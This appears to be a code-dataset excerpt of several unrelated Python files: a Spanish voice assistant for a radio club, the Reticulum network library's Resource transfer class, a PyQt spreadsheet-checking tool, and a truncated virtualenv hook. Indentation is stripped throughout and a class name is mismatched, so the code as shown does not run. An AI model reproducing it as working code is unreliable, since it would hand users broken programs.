#!/usr/bin/python
import threading
from time import sleep
import re
from core.twitterc import TwitterC
from core.voicerecognition import VoiceRecognition
from core.voicesynthetizer import VoiceSynthetizer
from modules.voicemail import VoiceMail
from modules.clock import Clock
from modules.identification import Identification
from modules.weather import Weather
from modules.messages import Messages
from modules.seismology import Seismology
def main(voicesynthetizer):
voicesynthetizer = voicesynthetizer
t = Assistante(voicesynthetizer)
t.go()
try:
join_threads(t.threads)
except KeyboardInterrupt:
print "\nKeyboardInterrupt catched."
print "Terminate main thread."
print "If only daemonic threads are left, terminate whole program."
class Assistant(object):
def __init__(self, voicesynthetizer):
self.modulename = 'Assistant'
self.running = True
self.introduced = False
self.threads = []
self.voicesynthetizer = voicesynthetizer
self.voicerecognition = VoiceRecognition(self.voicesynthetizer)
self.voicemail = VoiceMail(self.voicesynthetizer)
self.clock = Clock(voicesynthetizer)
self.identification = Identification(voicesynthetizer)
self.weather = Weather(self.voicesynthetizer)
self.messages = Messages(self.voicesynthetizer)
self.seismology = Seismology(self.voicesynthetizer)
def demo1(self):
self.introduction1()
self.command()
def demo2(self):
self.introduction2()
self.command()
def introduction1(self):
self.voicesynthetizer.speechit("Hola! Dime como puedo ayudarte?")
self.introduced = True
def introduction2(self):
while True:
self.voicerecognition.record('5')
output = self.voicerecognition.recognize('False')
if re.search(r'hola', output, re.M|re.I) or re.search(r'nu', output, re.M|re.I):
self.voicesynthetizer.speechit("Hola! Dime como puedo ayudarte?")
self.introduced = True
break
def command(self):
while self.introduced:
self.voicerecognition.record()
output = self.voicerecognition.recognize('False')
if re.search(r'identif', output, re.M|re.I):
print '[NuupXe] Assistant Identification'
self.identification.identify()
elif re.search(r'hora', output, re.M|re.I) or re.search(r'ora', output, re.M|re.I) :
print '[NuupXe] Assistant Hour'
self.clock.hour()
elif re.search(r'fecha', output, re.M|re.I):
print '[NuupXe] Assistant Date'
self.clock.date()
elif re.search(r'reporte', output, re.M|re.I) or re.search(r'clima', output, re.M|re.I):
print '[NuupXe] Assistant Weather'
self.weather.report()
elif re.search(r'estaciones', output, re.M|re.I) or re.search(r'repetidores', output, re.M|re.I):
print '[NuupXe] Assistant Stations'
self.messages.stations()
elif re.search(r'sismo', output, re.M|re.I):
print '[NuupXe] Assistant Seismic'
self.seismology.SismologicoMX()
elif re.search(r'mensaje', output, re.M|re.I) or re.search(r'avis', output, re.M|re.I):
print '[NuupXe] Assistant Message'
if self.voicemail.status:
self.voicesynthetizer.speechit("Mensaje existente!")
while True:
self.voicesynthetizer.speechit("Quieres escucharlo, borrarlo o salir de esta opcion")
self.voicerecognition.record()
output = self.voicerecognition.recognize('False')
if re.search(r'escuchar', output, re.M|re.I):
print '[NuupXe] Assistant Message Play'
self.voicemail.play()
elif re.search(r'borrar', output, re.M|re.I):
print '[NuupXe] Assistant Message Erase'
self.voicemail.erase()
elif re.search(r'salir', output, re.M|re.I):
print '[NuupXe] Assistant Message Quit'
self.voicesynthetizer.speechit("Saliendo de Opcion Mensaje")
break
else:
self.voicemail.record()
self.voicemail.play()
elif re.search(r'dormir', output, re.M|re.I):
print '[NuupXe] Assistant Sleep'
self.voicesynthetizer.speechit("Perfecto! Gracias! Dormire por los proximos 30 segundos")
sleep(30)
self.voicesynthetizer.speechit("Ya desperte! Que rica siesta!")
elif re.search(r'eventos', output, re.M|re.I):
print '[NuupXe] Assistant Bye'
self.voicesynthetizer.speechit("El radioclub tiene 2 eventos proximos")
self.voicesynthetizer.speechit("Boletin Tecnologico, Miercoles, 8:00 pm")
self.voicesynthetizer.speechit("Junta Mensual, Jueves 8:00 pm, recuerda traer galletas")
elif re.search(r'nada', output, re.M|re.I) or re.search(r'dios', output, re.M|re.I) or re.search(r'ativo', output, re.M|re.I):
print '[NuupXe] Assistant Bye'
self.voicesynthetizer.speechit("Hasta pronto!")
self.running = False
break
else:
print '[NuupXe] Assistant? Unknown!'
self.voicesynthetizer.speechit("Se ofrece algo mas?")
def foo(self):
while(self.running):
print '[NuupXe] Assistante | Foo Hello'
sleep(5)
def get_user_input(self):
while True:
x = raw_input("Tupe any text, Enter 'e' for exit: ")
if x.lower() == 'e':
self.running = False
break
else:
self.voicesynthetizer.speechit(x)
def twitter(self):
return
self.twitterc = TwitterC('twython')
self.oldstatus = ''
self.newstatus = ''
while (self.running):
print '[NuupXe] Assistante | Twitter Hello'
#self.voicesynthetizer.speechit("Veamos")
tstatus = self.twitterc.timeline_get('xe1gyq', 1)
for status in tstatus:
self.newstatus = status['text']
if self.newstatus != self.oldstatus:
self.oldstatus = self.newstatus
self.voicesynthetizer.speechit("Nuevo mensaje en cuenta de Twitter!")
self.voicesynthetizer.speechit(self.newstatus)
sleep(5)
def go(self):
t1 = threading.Thread(target=self.foo)
t2 = threading.Thread(target=self.get_user_input)
t3 = threading.Thread(target=self.twitter)
t4 = threading.Thread(target=self.demo1)
# Make threads daemonic, i.e. terminate them when main thread
# terminates. From: http://stackoverflow.com/a/3788243/145400
t1.daemon = True
t2.daemon = True
t3.daemon = True
t4.daemon = True
t1.start()
t2.start()
t3.start()
t4.start()
self.threads.append(t1)
self.threads.append(t2)
self.threads.append(t3)
self.threads.append(t4)
def join_threads(threads):
"""
Join threads in interruptable fashion.
From http://stackoverflow.com/a/9790882/145400
"""
for t in threads:
while t.isAlive():
t.join(5)
# Enf of File
|
Resource.py
|
import RNS
import os
import bz2
import math
import time
import threading
from .vendor import umsgpack as umsgpack
from time import sleep
class Resource:
"""
The Resource class allows transferring arbitrary amounts
of data over a link. It will automatically handle sequencing,
compression, coordination and checksumming.
:param data: The data to be transferred. Can be *bytes* or an open *file handle*. See the :ref:`Filetransfer Example<example-filetransfer>` for details.
:param link: The :ref:`RNS.Link<api-link>` instance on which to transfer the data.
:param advertise: Whether to automatically advertise the resource. Can be *True* or *False*.
:param auto_compress: Whether to auto-compress the resource. Can be *True* or *False*.
:param callback: A *callable* with the signature *callback(resource)*. Will be called when the resource transfer concludes.
:param progress_callback: A *callable* with the signature *callback(resource)*. Will be called whenever the resource transfer progress is updated.
:param segment_index: Internal use, ignore.
:param original_hash: Internal use, ignore.
"""
WINDOW_FLEXIBILITY = 4
WINDOW_MIN = 1
WINDOW_MAX = 10
WINDOW = 4
MAPHASH_LEN = 4
SDU = RNS.Packet.MDU
RANDOM_HASH_SIZE = 4
# This is an indication of what the
# maximum size a resource should be, if
# it is to be handled within reasonable
# time constraint, even on small systems.
# A small system in this regard is
# defined as a Raspberry Pi, which should
# be able to compress, encrypt and hash-map
# the resource in about 10 seconds.
# This constant will be used when determining
# how to sequence the sending of large resources.
MAX_EFFICIENT_SIZE = 16 * 1024 * 1024
# The maximum size to auto-compress with
# bz2 before sending.
AUTO_COMPRESS_MAX_SIZE = MAX_EFFICIENT_SIZE
# TODO: Should be allocated more
# intelligently
# TODO: Set higher
MAX_RETRIES = 5
SENDER_GRACE_TIME = 10
RETRY_GRACE_TIME = 0.25
HASHMAP_IS_NOT_EXHAUSTED = 0x00
HASHMAP_IS_EXHAUSTED = 0xFF
# Status constants
NONE = 0x00
QUEUED = 0x01
ADVERTISED = 0x02
TRANSFERRING = 0x03
AWAITING_PROOF = 0x04
ASSEMBLING = 0x05
COMPLETE = 0x06
FAILED = 0x07
CORRUPT = 0x08
@staticmethod
def accept(advertisement_packet, callback=None, progress_callback = None):
try:
adv = ResourceAdvertisement.unpack(advertisement_packet.plaintext)
resource = Resource(None, advertisement_packet.link)
resource.status = Resource.TRANSFERRING
resource.flags = adv.f
resource.size = adv.t
resource.total_size = adv.d
resource.uncompressed_size = adv.d
resource.hash = adv.h
resource.original_hash = adv.o
resource.random_hash = adv.r
resource.hashmap_raw = adv.m
resource.encrypted = True if resource.flags & 0x01 else False
resource.compressed = True if resource.flags >> 1 & 0x01 else False
resource.initiator = False
resource.callback = callback
resource.__progress_callback = progress_callback
resource.total_parts = int(math.ceil(resource.size/float(Resource.SDU)))
resource.received_count = 0
resource.outstanding_parts = 0
resource.parts = [None] * resource.total_parts
resource.window = Resource.WINDOW
resource.window_max = Resource.WINDOW_MAX
resource.window_min = Resource.WINDOW_MIN
resource.window_flexibility = Resource.WINDOW_FLEXIBILITY
resource.last_activity = time.time()
resource.storagepath = RNS.Reticulum.resourcepath+"/"+resource.original_hash.hex()
resource.segment_index = adv.i
resource.total_segments = adv.l
if adv.l > 1:
resource.split = True
else:
resource.split = False
resource.hashmap = [None] * resource.total_parts
resource.hashmap_height = 0
resource.waiting_for_hmu = False
resource.receiving_part = False
resource.consecutive_completed_height = 0
resource.link.register_incoming_resource(resource)
RNS.log("Accepting resource advertisement for "+RNS.prettyhexrep(resource.hash), RNS.LOG_DEBUG)
resource.link.callbacks.resource_started(resource)
resource.hashmap_update(0, resource.hashmap_raw)
resource.watchdog_job()
return resource
except Exception as e:
RNS.log("Could not decode resource advertisement, dropping resource", RNS.LOG_DEBUG)
return None
# Create a resource for transmission to a remote destination
# The data passed can be either a bytes-array or a file opened
# in binary read mode.
def __init__(self, data, link, advertise=True, auto_compress=True, callback=None, progress_callback=None, segment_index = 1, original_hash = None):
data_size = None
resource_data = None
if hasattr(data, "read"):
data_size = os.stat(data.name).st_size
self.total_size = data_size
self.grand_total_parts = math.ceil(data_size/Resource.SDU)
if data_size <= Resource.MAX_EFFICIENT_SIZE:
self.total_segments = 1
self.segment_index = 1
self.split = False
resource_data = data.read()
data.close()
else:
self.total_segments = ((data_size-1)//Resource.MAX_EFFICIENT_SIZE)+1
self.segment_index = segment_index
self.split = True
seek_index = segment_index-1
seek_position = seek_index*Resource.MAX_EFFICIENT_SIZE
data.seek(seek_position)
resource_data = data.read(Resource.MAX_EFFICIENT_SIZE)
self.input_file = data
elif isinstance(data, bytes):
data_size = len(data)
self.grand_total_parts = math.ceil(data_size/Resource.SDU)
self.total_size = data_size
resource_data = data
self.total_segments = 1
self.segment_index = 1
self.split = False
elif data == None:
pass
else:
raise TypeError("Invalid data instance type passed to resource initialisation")
data = resource_data
self.status = Resource.NONE
self.link = link
self.max_retries = Resource.MAX_RETRIES
self.retries_left = self.max_retries
self.default_timeout = self.link.default_timeout
self.timeout_factor = self.link.timeout_factor
self.sender_grace_time = Resource.SENDER_GRACE_TIME
self.hmu_retry_ok = False
self.watchdog_lock = False
self.__watchdog_job_id = 0
self.__progress_callback = progress_callback
self.rtt = None
self.receiver_min_consecutive_height = 0
if data != None:
self.initiator = True
self.callback = callback
self.uncompressed_data = data
compression_began = time.time()
if (auto_compress and len(self.uncompressed_data) < Resource.AUTO_COMPRESS_MAX_SIZE):
RNS.log("Compressing resource data...", RNS.LOG_DEBUG)
self.compressed_data = bz2.compress(self.uncompressed_data)
RNS.log("Compression completed in "+str(round(time.time()-compression_began, 3))+" seconds", RNS.LOG_DEBUG)
else:
self.compressed_data = self.uncompressed_data
self.uncompressed_size = len(self.uncompressed_data)
self.compressed_size = len(self.compressed_data)
if (self.compressed_size < self.uncompressed_size and auto_compress):
saved_bytes = len(self.uncompressed_data) - len(self.compressed_data)
RNS.log("Compression saved "+str(saved_bytes)+" bytes, sending compressed", RNS.LOG_DEBUG)
self.data = b""
self.data += RNS.Identity.get_random_hash()[:Resource.RANDOM_HASH_SIZE]
self.data += self.compressed_data
self.compressed = True
self.uncompressed_data = None
else:
self.data = b""
self.data += RNS.Identity.get_random_hash()[:Resource.RANDOM_HASH_SIZE]
self.data += self.uncompressed_data
self.uncompressed_data = self.data
self.compressed = False
self.compressed_data = None
if auto_compress:
RNS.log("Compression did not decrease size, sending uncompressed", RNS.LOG_DEBUG)
# Resources handle encryption directly to
# make optimal use of packet MTU on an entire
# encrypted stream. The Resource instance will
# use it's underlying link directly to encrypt.
if not self.link.encryption_disabled():
self.data = self.link.encrypt(self.data)
self.encrypted = True
else:
self.encrypted = False
self.size = len(self.data)
self.sent_parts = 0
hashmap_entries = int(math.ceil(self.size/float(Resource.SDU)))
hashmap_ok = False
while not hashmap_ok:
hashmap_computation_began = time.time()
RNS.log("Starting resource hashmap computation with "+str(hashmap_entries)+" entries...", RNS.LOG_DEBUG)
self.random_hash = RNS.Identity.get_random_hash()[:Resource.RANDOM_HASH_SIZE]
self.hash = RNS.Identity.full_hash(data+self.random_hash)
self.expected_proof = RNS.Identity.full_hash(data+self.hash)
if original_hash == None:
self.original_hash = self.hash
else:
self.original_hash = original_hash
self.parts = []
self.hashmap = b""
collision_guard_list = []
for i in range(0,hashmap_entries):
data = self.data[i*Resource.SDU:(i+1)*Resource.SDU]
map_hash = self.get_map_hash(data)
if map_hash in collision_guard_list:
RNS.log("Found hash collision in resource map, remapping...", RNS.LOG_VERBOSE)
hashmap_ok = False
break
else:
hashmap_ok = True
collision_guard_list.append(map_hash)
if len(collision_guard_list) > ResourceAdvertisement.COLLISION_GUARD_SIZE:
collision_guard_list.pop(0)
part = RNS.Packet(link, data, context=RNS.Packet.RESOURCE)
part.pack()
part.map_hash = map_hash
self.hashmap += part.map_hash
self.parts.append(part)
RNS.log("Hashmap computation concluded in "+str(round(time.time()-hashmap_computation_began, 3))+" seconds", RNS.LOG_DEBUG)
if advertise:
self.advertise()
else:
pass
def hashmap_update_packet(self, plaintext):
if not self.status == Resource.FAILED:
self.last_activity = time.time()
self.retries_left = self.max_retries
update = umsgpack.unpackb(plaintext[RNS.Identity.HASHLENGTH//8:])
self.hashmap_update(update[0], update[1])
def hashmap_update(self, segment, hashmap):
if not self.status == Resource.FAILED:
self.status = Resource.TRANSFERRING
seg_len = ResourceAdvertisement.HASHMAP_MAX_LEN
hashes = len(hashmap)//Resource.MAPHASH_LEN
for i in range(0,hashes):
if self.hashmap[i+segment*seg_len] == None:
self.hashmap_height += 1
self.hashmap[i+segment*seg_len] = hashmap[i*Resource.MAPHASH_LEN:(i+1)*Resource.MAPHASH_LEN]
self.waiting_for_hmu = False
self.request_next()
def get_map_hash(self, data):
# TODO: This will break if running unencrypted,
# uncompressed transfers on streams with long blocks
# of identical bytes. Doing so would be very silly
# anyways but maybe it should be handled gracefully.
return RNS.Identity.full_hash(data+self.random_hash)[:Resource.MAPHASH_LEN]
def advertise(self):
"""
Advertise the resource. If the other end of the link accepts
the resource advertisement it will begin transferring.
"""
thread = threading.Thread(target=self.__advertise_job)
thread.setDaemon(True)
thread.start()
def __advertise_job(self):
data = ResourceAdvertisement(self).pack()
self.advertisement_packet = RNS.Packet(self.link, data, context=RNS.Packet.RESOURCE_ADV)
while not self.link.ready_for_new_resource():
self.status = Resource.QUEUED
sleep(0.25)
try:
self.advertisement_packet.send()
self.last_activity = time.time()
self.adv_sent = self.last_activity
self.rtt = None
self.status = Resource.ADVERTISED
self.link.register_outgoing_resource(self)
RNS.log("Sent resource advertisement for "+RNS.prettyhexrep(self.hash), RNS.LOG_DEBUG)
except Exception as e:
RNS.log("Could not advertise resource, the contained exception was: "+str(e), RNS.LOG_ERROR)
self.cancel()
return
self.watchdog_job()
def watchdog_job(self):
thread = threading.Thread(target=self.__watchdog_job)
thread.setDaemon(True)
thread.start()
def __watchdog_job(self):
self.__watchdog_job_id += 1
this_job_id = self.__watchdog_job_id
while self.status < Resource.ASSEMBLING and this_job_id == self.__watchdog_job_id:
while self.watchdog_lock:
sleep(0.025)
sleep_time = None
if self.status == Resource.ADVERTISED:
sleep_time = (self.adv_sent+self.default_timeout)-time.time()
if sleep_time < 0:
if self.retries_left <= 0:
RNS.log("Resource transfer timeout after sending advertisement", RNS.LOG_DEBUG)
self.cancel()
sleep_time = 0.001
else:
try:
RNS.log("No part requests received, retrying resource advertisement...", RNS.LOG_DEBUG)
self.retries_left -= 1
self.advertisement_packet.resend()
self.last_activity = time.time()
self.adv_sent = self.last_activity
sleep_time = 0.001
except Exception as e:
RNS.log("Could not resend advertisement packet, cancelling resource", RNS.LOG_VERBOSE)
self.cancel()
elif self.status == Resource.TRANSFERRING:
if not self.initiator:
rtt = self.link.rtt if self.rtt == None else self.rtt
sleep_time = self.last_activity + (rtt*self.timeout_factor) + Resource.RETRY_GRACE_TIME - time.time()
if sleep_time < 0:
if self.retries_left > 0:
RNS.log("Timed out waiting for parts, requesting retry", RNS.LOG_DEBUG)
if self.window > self.window_min:
self.window -= 1
if self.window_max > self.window_min:
self.window_max -= 1
if (self.window_max - self.window) > (self.window_flexibility-1):
self.window_max -= 1
sleep_time = 0.001
self.retries_left -= 1
self.waiting_for_hmu = False
self.request_next()
else:
self.cancel()
sleep_time = 0.001
else:
max_wait = self.rtt * self.timeout_factor * self.max_retries + self.sender_grace_time
sleep_time = self.last_activity + max_wait - time.time()
if sleep_time < 0:
RNS.log("Resource timed out waiting for part requests", RNS.LOG_DEBUG)
self.cancel()
sleep_time = 0.001
elif self.status == Resource.AWAITING_PROOF:
sleep_time = self.last_part_sent + (self.rtt*self.timeout_factor+self.sender_grace_time) - time.time()
if sleep_time < 0:
if self.retries_left <= 0:
RNS.log("Resource timed out waiting for proof", RNS.LOG_DEBUG)
self.cancel()
sleep_time = 0.001
else:
RNS.log("All parts sent, but no resource proof received, querying network cache...", RNS.LOG_DEBUG)
self.retries_left -= 1
expected_data = self.hash + self.expected_proof
expected_proof_packet = RNS.Packet(self.link, expected_data, packet_type=RNS.Packet.PROOF, context=RNS.Packet.RESOURCE_PRF)
expected_proof_packet.pack()
RNS.Transport.cache_request(expected_proof_packet.packet_hash, self.link)
self.last_part_sent = time.time()
sleep_time = 0.001
if sleep_time == 0:
RNS.log("Warning! Link watchdog sleep time of 0!", RNS.LOG_WARNING)
if sleep_time == None or sleep_time < 0:
RNS.log("Timing error, cancelling resource transfer.", RNS.LOG_ERROR)
self.cancel()
if sleep_time != None:
sleep(sleep_time)
def assemble(self):
if not self.status == Resource.FAILED:
try:
self.status = Resource.ASSEMBLING
stream = b"".join(self.parts)
if self.encrypted:
data = self.link.decrypt(stream)
else:
data = stream
# Strip off random hash
data = data[Resource.RANDOM_HASH_SIZE:]
if self.compressed:
self.data = bz2.decompress(data)
else:
self.data = data
calculated_hash = RNS.Identity.full_hash(self.data+self.random_hash)
if calculated_hash == self.hash:
self.file = open(self.storagepath, "ab")
self.file.write(self.data)
self.file.close()
self.status = Resource.COMPLETE
self.prove()
else:
self.status = Resource.CORRUPT
except Exception as e:
RNS.log("Error while assembling received resource.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
self.status = Resource.CORRUPT
self.link.resource_concluded(self)
if self.segment_index == self.total_segments:
if self.callback != None:
self.data = open(self.storagepath, "rb")
self.callback(self)
try:
self.data.close()
os.unlink(self.storagepath)
except Exception as e:
RNS.log("Error while cleaning up resource files, the contained exception was:", RNS.LOG_ERROR)
RNS.log(str(e))
else:
RNS.log("Resource segment "+str(self.segment_index)+" of "+str(self.total_segments)+" received, waiting for next segment to be announced", RNS.LOG_DEBUG)
def prove(self):
if not self.status == Resource.FAILED:
try:
proof = RNS.Identity.full_hash(self.data+self.hash)
proof_data = self.hash+proof
proof_packet = RNS.Packet(self.link, proof_data, packet_type=RNS.Packet.PROOF, context=RNS.Packet.RESOURCE_PRF)
proof_packet.send()
except Exception as e:
RNS.log("Could not send proof packet, cancelling resource", RNS.LOG_DEBUG)
RNS.log("The contained exception was: "+str(e), RNS.LOG_DEBUG)
self.cancel()
def validate_proof(self, proof_data):
if not self.status == Resource.FAILED:
if len(proof_data) == RNS.Identity.HASHLENGTH//8*2:
if proof_data[RNS.Identity.HASHLENGTH//8:] == self.expected_proof:
self.status = Resource.COMPLETE
self.link.resource_concluded(self)
if self.segment_index == self.total_segments:
# If all segments were processed, we'll
# signal that the resource sending concluded
if self.callback != None:
self.callback(self)
else:
# Otherwise we'll recursively create the
# next segment of the resource
Resource(self.input_file, self.link, callback = self.callback, segment_index = self.segment_index+1, original_hash=self.original_hash)
else:
pass
else:
pass
def receive_part(self, packet):
while self.receiving_part:
sleep(0.001)
self.receiving_part = True
self.last_activity = time.time()
self.retries_left = self.max_retries
if self.req_resp == None:
self.req_resp = self.last_activity
rtt = self.req_resp-self.req_sent
if self.rtt == None:
self.rtt = rtt
self.watchdog_job()
elif self.rtt < rtt:
self.rtt = rtt
if not self.status == Resource.FAILED:
self.status = Resource.TRANSFERRING
part_data = packet.data
part_hash = self.get_map_hash(part_data)
i = self.consecutive_completed_height
for map_hash in self.hashmap[self.consecutive_completed_height:self.consecutive_completed_height+self.window]:
if map_hash == part_hash:
if self.parts[i] == None:
# Insert data into parts list
self.parts[i] = part_data
self.received_count += 1
self.outstanding_parts -= 1
# Update consecutive completed pointer
if i == self.consecutive_completed_height + 1:
self.consecutive_completed_height = i
cp = self.consecutive_completed_height + 1
while cp < len(self.parts) and self.parts[cp] != None:
self.consecutive_completed_height = cp
cp += 1
i += 1
self.receiving_part = False
if self.__progress_callback != None:
self.__progress_callback(self)
if self.outstanding_parts == 0 and self.received_count == self.total_parts:
self.assemble()
elif self.outstanding_parts == 0:
# TODO: Figure out if there is a mathematically
# optimal way to adjust windows
if self.window < self.window_max:
self.window += 1
if (self.window - self.window_min) > (self.window_flexibility-1):
self.window_min += 1
self.request_next()
else:
self.receiving_part = False
# Called on incoming resource to send a request for more data
def request_next(self):
while self.receiving_part:
sleep(0.001)
if not self.status == Resource.FAILED:
if not self.waiting_for_hmu:
self.outstanding_parts = 0
hashmap_exhausted = Resource.HASHMAP_IS_NOT_EXHAUSTED
requested_hashes = b""
offset = (1 if self.consecutive_completed_height > 0 else 0)
i = 0; pn = self.consecutive_completed_height+offset
search_start = pn
for part in self.parts[search_start:search_start+self.window]:
if part == None:
part_hash = self.hashmap[pn]
if part_hash != None:
requested_hashes += part_hash
self.outstanding_parts += 1
i += 1
else:
hashmap_exhausted = Resource.HASHMAP_IS_EXHAUSTED
pn += 1
if i >= self.window or hashmap_exhausted == Resource.HASHMAP_IS_EXHAUSTED:
break
hmu_part = bytes([hashmap_exhausted])
if hashmap_exhausted == Resource.HASHMAP_IS_EXHAUSTED:
last_map_hash = self.hashmap[self.hashmap_height-1]
hmu_part += last_map_hash
self.waiting_for_hmu = True
requested_data = b""
request_data = hmu_part + self.hash + requested_hashes
request_packet = RNS.Packet(self.link, request_data, context = RNS.Packet.RESOURCE_REQ)
try:
request_packet.send()
self.last_activity = time.time()
self.req_sent = self.last_activity
self.req_resp = None
except Exception as e:
RNS.log("Could not send resource request packet, cancelling resource", RNS.LOG_DEBUG)
RNS.log("The contained exception was: "+str(e), RNS.LOG_DEBUG)
self.cancel()
# Called on outgoing resource to make it send more data
def request(self, request_data):
if not self.status == Resource.FAILED:
rtt = time.time() - self.adv_sent
if self.rtt == None:
self.rtt = rtt
if self.status != Resource.TRANSFERRING:
self.status = Resource.TRANSFERRING
self.watchdog_job()
self.retries_left = self.max_retries
wants_more_hashmap = True if request_data[0] == Resource.HASHMAP_IS_EXHAUSTED else False
pad = 1+Resource.MAPHASH_LEN if wants_more_hashmap else 1
requested_hashes = request_data[pad+RNS.Identity.HASHLENGTH//8:]
for i in range(0,len(requested_hashes)//Resource.MAPHASH_LEN):
requested_hash = requested_hashes[i*Resource.MAPHASH_LEN:(i+1)*Resource.MAPHASH_LEN]
search_start = self.receiver_min_consecutive_height
search_end = self.receiver_min_consecutive_height+ResourceAdvertisement.COLLISION_GUARD_SIZE
for part in self.parts[search_start:search_end]:
if part.map_hash == requested_hash:
try:
if not part.sent:
part.send()
self.sent_parts += 1
else:
part.resend()
self.last_activity = time.time()
self.last_part_sent = self.last_activity
break
except Exception as e:
RNS.log("Resource could not send parts, cancelling transfer!", RNS.LOG_DEBUG)
RNS.log("The contained exception was: "+str(e), RNS.LOG_DEBUG)
self.cancel()
if wants_more_hashmap:
last_map_hash = request_data[1:Resource.MAPHASH_LEN+1]
part_index = self.receiver_min_consecutive_height
search_start = part_index
search_end = self.receiver_min_consecutive_height+ResourceAdvertisement.COLLISION_GUARD_SIZE
for part in self.parts[search_start:search_end]:
part_index += 1
if part.map_hash == last_map_hash:
break
self.receiver_min_consecutive_height = max(part_index-1-Resource.WINDOW_MAX, 0)
if part_index % ResourceAdvertisement.HASHMAP_MAX_LEN != 0:
RNS.log("Resource sequencing error, cancelling transfer!", RNS.LOG_ERROR)
self.cancel()
else:
segment = part_index // ResourceAdvertisement.HASHMAP_MAX_LEN
hashmap_start = segment*ResourceAdvertisement.HASHMAP_MAX_LEN
hashmap_end = min((segment+1)*ResourceAdvertisement.HASHMAP_MAX_LEN, len(self.parts))
hashmap = b""
for i in range(hashmap_start,hashmap_end):
hashmap += self.hashmap[i*Resource.MAPHASH_LEN:(i+1)*Resource.MAPHASH_LEN]
hmu = self.hash+umsgpack.packb([segment, hashmap])
hmu_packet = RNS.Packet(self.link, hmu, context = RNS.Packet.RESOURCE_HMU)
try:
hmu_packet.send()
self.last_activity = time.time()
except Exception as e:
RNS.log("Could not send resource HMU packet, cancelling resource", RNS.LOG_DEBUG)
RNS.log("The contained exception was: "+str(e), RNS.LOG_DEBUG)
self.cancel()
if self.sent_parts == len(self.parts):
self.status = Resource.AWAITING_PROOF
if self.__progress_callback != None:
self.__progress_callback(self)
def cancel(self):
"""
Cancels transferring the resource.
"""
if self.status < Resource.COMPLETE:
self.status = Resource.FAILED
if self.initiator:
if self.link.status == RNS.Link.ACTIVE:
try:
cancel_packet = RNS.Packet(self.link, self.hash, context=RNS.Packet.RESOURCE_ICL)
cancel_packet.send()
except Exception as e:
RNS.log("Could not send resource cancel packet, the contained exception was: "+str(e), RNS.LOG_ERROR)
self.link.cancel_outgoing_resource(self)
else:
self.link.cancel_incoming_resource(self)
if self.callback != None:
self.link.resource_concluded(self)
self.callback(self)
def progress_callback(self, callback):
self.__progress_callback = callback
def progress(self):
"""
:returns: The current progress of the resource transfer as a *float* between 0.0 and 1.0.
"""
if self.initiator:
self.processed_parts = (self.segment_index-1)*math.ceil(Resource.MAX_EFFICIENT_SIZE/Resource.SDU)
self.processed_parts += self.sent_parts
self.progress_total_parts = float(self.grand_total_parts)
else:
self.processed_parts = (self.segment_index-1)*math.ceil(Resource.MAX_EFFICIENT_SIZE/Resource.SDU)
self.processed_parts += self.received_count
if self.split:
self.progress_total_parts = float(math.ceil(self.total_size/Resource.SDU))
else:
self.progress_total_parts = float(self.total_parts)
progress = self.processed_parts / self.progress_total_parts
return progress
def __str__(self):
return RNS.prettyhexrep(self.hash)+str(self.link)
class ResourceAdvertisement:
HASHMAP_MAX_LEN = 73
COLLISION_GUARD_SIZE = 2*Resource.WINDOW_MAX+HASHMAP_MAX_LEN
def __init__(self, resource=None):
if resource != None:
self.t = resource.size # Transfer size
self.d = resource.total_size # Total uncompressed data size
self.n = len(resource.parts) # Number of parts
self.h = resource.hash # Resource hash
self.r = resource.random_hash # Resource random hash
self.o = resource.original_hash # First-segment hash
self.m = resource.hashmap # Resource hashmap
self.c = resource.compressed # Compression flag
self.e = resource.encrypted # Encryption flag
self.s = resource.split # Split flag
self.i = resource.segment_index # Segment index
self.l = resource.total_segments # Total segments
self.f = 0x00 | self.s << 2 | self.c << 1 | self.e # Flags
def pack(self, segment=0):
hashmap_start = segment*ResourceAdvertisement.HASHMAP_MAX_LEN
hashmap_end = min((segment+1)*(ResourceAdvertisement.HASHMAP_MAX_LEN), self.n)
hashmap = b""
for i in range(hashmap_start,hashmap_end):
hashmap += self.m[i*Resource.MAPHASH_LEN:(i+1)*Resource.MAPHASH_LEN]
dictionary = {
"t": self.t, # Transfer size
"d": self.d, # Data size
"n": self.n, # Number of parts
"h": self.h, # Resource hash
"r": self.r, # Resource random hash
"o": self.o, # Original hash
"i": self.i, # Segment index
"l": self.l, # Total segments
"f": self.f, # Resource flags
"m": hashmap
}
return umsgpack.packb(dictionary)
@staticmethod
def unpack(data):
dictionary = umsgpack.unpackb(data)
adv = ResourceAdvertisement()
adv.t = dictionary["t"]
adv.d = dictionary["d"]
adv.n = dictionary["n"]
adv.h = dictionary["h"]
adv.r = dictionary["r"]
adv.o = dictionary["o"]
adv.m = dictionary["m"]
adv.f = dictionary["f"]
adv.i = dictionary["i"]
adv.l = dictionary["l"]
adv.e = True if (adv.f & 0x01) == 0x01 else False
adv.c = True if ((adv.f >> 1) & 0x01) == 0x01 else False
adv.s = True if ((adv.f >> 2) & 0x01) == 0x01 else False
return adv
|
mian.py
|
from subprocess import run
import sys,Ui_FormUi,Excel,threading
from PyQt5.QtWidgets import QApplication, QFileDialog, QMainWindow
def get_file():
name = QFileDialog.getOpenFileName(None,"选择文件", "/", "xlsx files (*.xlsx);;xls files (*.xls);;all files (*)")
if name[0] != "":
global path
path = name[0]
ui.filelabel.setText(path)
global sheet_list
sheet_list = Excel.GetSheet(path)
ui.sheetlist.clear()
for i in sheet_list:
ui.sheetlist.addItem(i)
ui.sheetlist.setCurrentRow(0)
ui.runbutton.setEnabled(True)
ui.rangecombom.setEnabled(True)
def run():
column = ui.rangecombom.itemText(ui.rangecombom.currentIndex())
selnum = ui.sheetlist.currentRow()
t = threading.Thread(target=Excel.verify,args=(path,sheet_list[selnum],column[0],ui.idbutton.isChecked(),),daemon = True)
t.start()
def main():
app = QApplication(sys.argv)
MainWindow = QMainWindow()
global ui
ui = Ui_FormUi.Ui_MainWindow()
ui.setupUi(MainWindow)
ui.getfilebutton.clicked.connect(get_file)
ui.runbutton.clicked.connect(run)
ui.exitbutton.clicked.connect(sys.exit)
ui.runbutton.setEnabled(False)
ui.rangecombom.setEnabled(False)
ui.idbutton.setChecked(True)
for asc in range(65,90 + 1):
ui.rangecombom.addItem("{}列".format(chr(asc)))
MainWindow.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
executor.py
|
#!/usr/bin/env python
# hook for virtualenv
# switch to the virtualenv where the executor belongs,
# replace all the path for modules
import sys, os.path
P = 'site-packages'
apath = os.path.abspath(__file__)
if P in apath:
virltualenv = apath[:apath.index(P)]
